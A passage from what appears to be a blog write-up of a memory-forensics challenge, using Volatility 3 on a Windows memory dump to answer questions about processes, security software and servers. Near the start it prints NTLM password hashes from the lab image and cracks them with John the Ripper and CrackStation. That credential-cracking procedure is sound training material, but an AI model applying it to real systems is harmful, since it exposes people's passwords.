<span><span style="color: white;">└─$ cat hashdump.txt | </span><b><span style="color: #fcff01;">sed -e "s/\s/:/g;1,4d"</span></b></span>
<span style="color: white;">Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">securitynik:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">nakia:1003:aad3b435b51404eeaad3b435b51404ee:f1c216dcadb73b5960bbcdf03bf3bbe0</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ cat hashdump.txt | </span><b><span style="color: #fcff01;">sed -e "s/\s/:/g;1,4d" > new_hashdump.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, I used <i>sed </i>to replace the spaces with "<i>:</i>" while at the same time, using <i>sed </i>to delete the first 4 lines. This makes the file cleaner for tools such as <i>hashcat</i> and <i>john</i>.</div><div><br /></div><div>Using <i>John </i>we see the passwords are:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">john --format=nt new john --format=nt new_hashdump.txt</span></b></span>
<span style="color: white;">Created directory: /home/kali/.john</span>
<span style="color: white;">Using default input encoding: UTF-8</span>
<span style="color: white;">Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])</span>
<span style="color: white;">Warning: no OpenMP support for this hash type, consider --fork=4</span>
<span style="color: white;">Proceeding with single, rules:Single</span>
<span style="color: white;">Press 'q' or Ctrl-C to abort, almost any other key for status</span>
<span style="color: white;">Almost done: Processing the remaining buffered candidate passwords, if any.</span>
<span style="color: white;">Proceeding with wordlist:/usr/share/john/password.lst</span>
<span style="color: white;"> (Guest)</span>
<span style="color: white;"> (DefaultAccount)</span>
<b><span style="color: #fcff01;"><span>Testing1 (Administrator)</span>
<span>Testing1 (securitynik)</span></span></b>
<span style="color: white;">Proceeding with incremental:ASCII</span>
<span style="color: white;">4g 0:00:06:42 3/3 0.009944g/s 34234Kp/s 34234Kc/s 68468KC/s ccr2brim..ccr2br04</span>
<span style="color: white;">Use the "--show --format=NT" options to display all of the cracked passwords reliably</span>
<span style="color: white;">Session aborted</span>
</pre></div>
</div><div><br /></div><div><div>Alternatively, I could have just format the passwords by extracting the NTLM hashes and providing them to <a href="https://crackstation.net/">https://crackstation.net/</a></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat new_hashdump.txt | awk --field-separator=':' '{ print $4 }'</span>
<span style="color: white;">23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">f1c216dcadb73b5960bbcdf03bf3bbe0</span>
</pre></div>
</div><div><br /></div><div><div>These hashes can then be passed to crack station. see below:<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8x_P5Ql0XBPXGjymuBQscngUoHktbtCwvpqCmeb67Rxai5duNvk9luvxjrbLt0nugBcn8_TSUyyR8P9-yOIpZTha4R_Ih4TO5JEjCTwrEpWZulfKUJ9mwZMdbRP__ntNZMcCtJ71y1SpPwa4kqputrHHZjGwovKQS72pjP_WqJQsFYexp5iPUAz2djvg/s859/Crackstation%20-%20Raw%20Hashes.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="859" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8x_P5Ql0XBPXGjymuBQscngUoHktbtCwvpqCmeb67Rxai5duNvk9luvxjrbLt0nugBcn8_TSUyyR8P9-yOIpZTha4R_Ih4TO5JEjCTwrEpWZulfKUJ9mwZMdbRP__ntNZMcCtJ71y1SpPwa4kqputrHHZjGwovKQS72pjP_WqJQsFYexp5iPUAz2djvg/w400-h198/Crackstation%20-%20Raw%20Hashes.PNG" width="400" /></a></div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Here we see the results of the cracked passwords:</div><div><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtiqLRHPDYGeEiXvqfI2MxPjcNzDGVJSj49a3jS8ZyzxK7SbCA78kRze5ZwKp4EgIzZaprH5AEajx0umAjv6nrdgpofwb3viVlfOuskdZ5_Uy2GfkUCMnsibNqGgYamiH72KE8RhOLj6rXLJDGjB5l6ieYnW1fzfGezPlloSh67awu5UTNCALZMmCQFaQ/s865/Crackstation%20-%20Hashes%20Cracked.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="683" data-original-width="865" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtiqLRHPDYGeEiXvqfI2MxPjcNzDGVJSj49a3jS8ZyzxK7SbCA78kRze5ZwKp4EgIzZaprH5AEajx0umAjv6nrdgpofwb3viVlfOuskdZ5_Uy2GfkUCMnsibNqGgYamiH72KE8RhOLj6rXLJDGjB5l6ieYnW1fzfGezPlloSh67awu5UTNCALZMmCQFaQ/w400-h316/Crackstation%20-%20Hashes%20Cracked.PNG" width="400" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><div>These can also further be confirmed via:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ john --show --format=nt new_hashdump.txt</span>
<span style="color: white;">Administrator:Testing1:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">securitynik:Testing1:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026</span>
</pre></div>
<br /><div>Q: What are the passwords for all users?</div><div>A: <i>Guest</i> and <i>Default </i>Account seems to have blank passwords, while <i>Administrator </i>and <i>SecurityNik </i>have password of <i>Testing1</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> (Guest)</span>
<span style="color: white;"> (DefaultAccount)</span>
<span style="color: white;">Testing1 (Administrator)</span>
<span style="color: white;">Testing1 (securitynik)</span>
</pre></div>
</div><div><br /></div><div><div>I was unable to determine the password for the user "<i>Nakia</i>"</div><div><br /></div><div>With Creds out of the way, let's move on.</div><div><br /></div><div>Let's start this process (pun intended :-D ) off by looking at the processes.</div><div><br /></div><div>I start this off by writing the <i>pslist </i>information to a file and to the screen.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList</span></b><span style="color: white;"> </span><b><span style="color: #fcff01;">> pslist.txt</span></b></span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
</pre></div>
</div></div></div><div><br /></div><div><div>Confirm the file was created: </div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ls pslist.txt</span>
<span style="color: white;">pslist.txt</span>
</pre></div>
</div><div><br /></div><div><div>With this in place, time for some questions.</div><div><br /></div><div><b>Q: </b>How many unique processes (based on names) have one (1) occurrence?</div><div><b>A: </b>There are 49 processes with 1 occurrence:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | grep --perl-regexp '\s+?1\s+' | wc --lines</span>
<span style="color: white;">49</span>
</pre></div>
</div><div><br /></div><div><div>Q: How many unique processes, based on names were seen at the time of this memory capture?</div><div>A: There were 68 unique processes based on their names:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">68</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> How many active processes were running on the system, when this capture was taken.</div><div><b>A:</b> 220. - If you look at just the lines returned you will get 224. However, we need to remove headers and spaces from above. This produces 220.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | wc --lines</span>
<span style="color: white;">224</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | wc --lines</span>
<span style="color: white;">220</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What are the top 10 processes based on occurrences/count? </div><div><b>A:</b> Here are the top 10 processes:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=10</span>
<span style="color: white;"> 78 svchost.exe</span>
<span style="color: white;"> 15 MoNotification</span>
<span style="color: white;"> 12 cmd.exe</span>
<span style="color: white;"> 12 chrome.exe</span>
<span style="color: white;"> 9 conhost.exe</span>
<span style="color: white;"> 8 msedge.exe</span>
<span style="color: white;"> 6 RuntimeBroker.</span>
<span style="color: white;"> 6 powershell.exe</span>
<span style="color: white;"> 4 OpenConsole.ex</span>
<span style="color: white;"> 3 dllhost.exe</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is the process with the most occurrence/count?</div><div><b>A:</b> The process most seen was <i>svchost.exe</i> with 78 counts</div><div><br /></div><div><b>Q:</b> For the process that is seen the most, what is the "<i>CreateTime</i>" of the first and last instances seen of this process?</div><div><b>A:</b> Answer here:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat pslist.txt | sed '1,4d;$d' | grep 'svchost.exe' | sed '2,77d'</span>
<span><span style="color: white;">884 696 svchost.exe 0xe78bf2c90080 19 - 0 False </span><b><span style="color: #fcff01;">2023-11-16 19:09:13.000000 </span></b><span style="color: white;"> N/A Disabled</span></span>
<span><span style="color: white;">2220 696 svchost.exe 0xe78bf70870c0 5 - 0 False </span><b><span style="color: #fcff01;">2023-11-16 23:56:45.000000</span></b><span style="color: white;"> N/A Disabled</span></span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> How many unique process names were seen active (not exited) at the time of this memory capture?</div><div><b>A:</b> 66<br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines
66</span>
</pre></div></div><div><br /></div><div><b>Q:</b> How many unique processes that have exited, based on their Process ID (PID)</div><div><b>A:</b> Based on PID, there were 23 unique processes, based on PID that have exited.</div></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match
Volatility 3 Framework 2.5.2
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
5556 696 svchost.exe 0xe78bf33a80c0 0 - 0 False 2023-11-16 19:12:58.000000 2023-11-16 19:13:04.000000 Disabled
2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled
2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled
5708 1280 TabTip.exe 0xe78bf42321c0 0 - 1 False 2023-11-16 19:24:25.000000 2023-11-16 19:25:14.000000 Disabled
3040 768 userinit.exe 0xe78bf517f080 0 - 1 False 2023-11-16 19:24:46.000000 2023-11-16 19:25:17.000000 Disabled
7040 1100 msedge.exe 0xe78bf4e300c0 0 - 1 False 2023-11-16 19:25:26.000000 2023-11-16 21:19:45.000000 Disabled
484 4776 MoNotification 0xe78bf46ef080 0 - 1 False 2023-11-16 19:30:34.000000 2023-11-16 19:54:19.000000 Disabled
1012 4776 MoNotification 0xe78bf51750c0 0 - 1 False 2023-11-16 19:54:18.000000 2023-11-16 19:54:19.000000 Disabled
3148 4776 MoNotification 0xe78bf428c0c0 0 - 1 False 2023-11-16 19:54:19.000000 2023-11-16 19:54:37.000000 Disabled
2816 4776 MoNotification 0xe78bf4fc30c0 0 - 1 False 2023-11-16 19:54:37.000000 2023-11-16 20:26:01.000000 Disabled
4908 4776 MoNotification 0xe78bf4ec9080 0 - 1 False 2023-11-16 20:26:00.000000 2023-11-16 20:26:01.000000 Disabled
6168 4776 MoNotification 0xe78bf32c4080 0 - 1 False 2023-11-16 20:26:01.000000 2023-11-16 20:27:32.000000 Disabled
5348 4776 MoNotification 0xe78bf4ebe080 0 - 1 False 2023-11-16 20:27:32.000000 2023-11-16 21:34:07.000000 Disabled
8848 4776 MoNotification 0xe78bf689b0c0 0 - 1 False 2023-11-16 21:34:06.000000 2023-11-16 21:34:07.000000 Disabled
7200 4776 MoNotification 0xe78bf62da0c0 0 - 1 False 2023-11-16 21:34:07.000000 2023-11-16 21:35:30.000000 Disabled
4116 4776 MoNotification 0xe78bf61950c0 0 - 1 False 2023-11-16 21:35:30.000000 2023-11-16 22:55:10.000000 Disabled
488 4000 VMwareResoluti 0xe78bf2b65080 0 - 1 False 2023-11-16 21:37:30.000000 2023-11-16 21:37:31.000000 Disabled
5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 Disabled
4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled
2860 4776 MoNotification 0xe78bf671b0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:55:10.000000 Disabled
5424 4776 MoNotification 0xe78bf62ec0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:56:41.000000 Disabled
6764 4776 MoNotification 0xe78bf8e9c080 0 - 1 False 2023-11-16 22:56:41.000000 2023-11-16 23:56:45.000000 Disabled
2752 4776 MoNotification 0xe78bf67170c0 0 - 1 False 2023-11-16 23:56:44.000000 2023-11-16 23:56:45.000000 Disabled</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> How many unique processes by names that have exited?</div><div><b>A:</b> Based on unique process names, there were 8 unique process names for processes which have exited.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique | wc --lines
8</span>
</pre></div></div><div><br /></div></div><div>These are the unique processes.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique
cmd.exe
MoNotification
msedge.exe
powershell.exe
svchost.exe
TabTip.exe
userinit.exe
VMwareResoluti</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What Endpoint Detection and Response (EDR) Mechanism was installed on this system at the time of taking this memory capture?</div><div><b>A:</b> Microsoft Defender</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep --ignore-case "MSMp"
4032 696 </span><b><span style="color: #fcff01;">MsMpEng.exe</span></b><span style="color: white;"> 0xe78bf38b5080 14 - 0 False 2023-11-16 19:09:46.000000 N/A Disabled</span>
</pre></div></div><div><br /><div>From a different perspective:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssh_logs/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.joblinks.JobLinks> job_links.txt
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat job_links.txt | head --lines=6
Volatility 3 Framework 2.5.2
Offset(V) Name PID PPID Sess JobSess Wow64 Total Active Term JobLink Process
0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 25 1 0 N/A (Original Process)
* 0xe78bf38b5080 </span><b><span style="color: #fcff01;">MsMpEng.exe </span></b><span style="color: white;"> 4032 696 0 0 False 0 0 0 Yes </span><span style="color: #fcff01;"><b> C:\Program Files\Windows Defender\MsMpEng.exe
</b></span></pre><div><br /></div></div></div><div><br /></div></div><div><b>Q:</b> What Database server is running on the system?</div><div><b>A:</b> MySQL. This is determined from <i>mysqld.exe</i>.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep --ignore-case "mysql"
9044 8100 </span><b><span style="color: #fcff01;">mysqld.exe </span></b><span style="color: white;"> 0xe78bf4fa5080 30 - 1 False 2023-11-16 23:26:13.000000 N/A Disabled</span>
</pre></div></div><div><br /></div><div><b>Q:</b> What Webserver server is running on the system?</div><div><b>A:</b> httpd. Apache! https://httpd.apache.org/download.cgi</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pslist.txt | grep http
10008 8100 </span><b><span style="color: #fcff01;">httpd.exe</span></b><span style="color: white;"> 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 </span><span style="color: #fcff01;">httpd.exe</span><span style="color: white;"> 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled</span>
</pre></div></div><div><br /></div></div><div><div>Even more process information:</div><div>At first, we looked at standalone processes now let's transition this to seeing the relationship across the processes.</div><div><br /></div><div>With a solid understanding of identifying process, let's look at least one more place.</div><div><br />First get the process tree information into a file:</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.txt
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div>Q: Which process has the most handles opened? What is the process name and process id?</div><div>A: The process is httpd.exe but there are two. However, the one with PID 5088 is what we need:</div><br /><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep http
**** 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A
***** </span><b><span style="color: #fcff01;">5088 </span></b><span style="color: white;">10008 </span><b><span style="color: #fcff01;">httpd.exe</span></b><span style="color: white;"> 0xe78bf61b9080 </span><b><span style="color: #fcff01;"> 156 </span></b><span style="color: white;"> - 1 False 2023-11-16 23:26:16.000000 N/A</span>
</pre></div></div><div><br /><b>Update</b>: After revisiting this, it seems my <i>grep </i>on <i>http </i>was incorrect. This caught the <i>156</i> <i>threads</i> column not the handles. I changed my technique and instead decided to put this into a CSV file.<br /><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py </span><b><span style="color: #fcff01;">--renderer csv</span></b><span style="color: white;"> --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.csv</span></pre></div></div></div><div><br /></div><div>This CSV gives a better opportunity to sort the fields. Now when I sort the fields, it seems the handles information is empty here.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.csv | awk --field-separator=',' '{ print $7 }' | sort | uniq
-
Handles</span></pre></div></div><div><br /></div></div><div>Now we can see no handles are being reported here. Let's now try to do the same thing for the <i>pslist </i>plugin to see if we get some data we can work with.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py </span><b><span style="color: #fcff01;">--renderer csv</span></b><span style="color: white;"> --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist | cut -f 7 -d ',' | sort | uniq
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
-
Handles</span></pre></div></div><div><br /></div></div><div>Epic failure! :-) My initial answer was 156 this is obviously wrong! Why did I not just update the blog to reflect the new material and remove the incorrect answer? Great question! One of the problems with forensics is that we need to ensure we are validating our tools and techniques. This is why we should not rely on any one tool or technique but always try other ways or have our work peer reviewed. I am leaving my mistake above, so you can see my errors as I am human just like you :-) If you see any other errors, do let me know.</div><div><br /><br /></div><div><b>Q:</b> Starting at a count of 2 (**), which process has the largest count of children?</div><div><b>A:</b> The process with the most children is svchost.exe with process id 884</div><div><br /></div><div>The process in the previous section spawned 22 children.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: 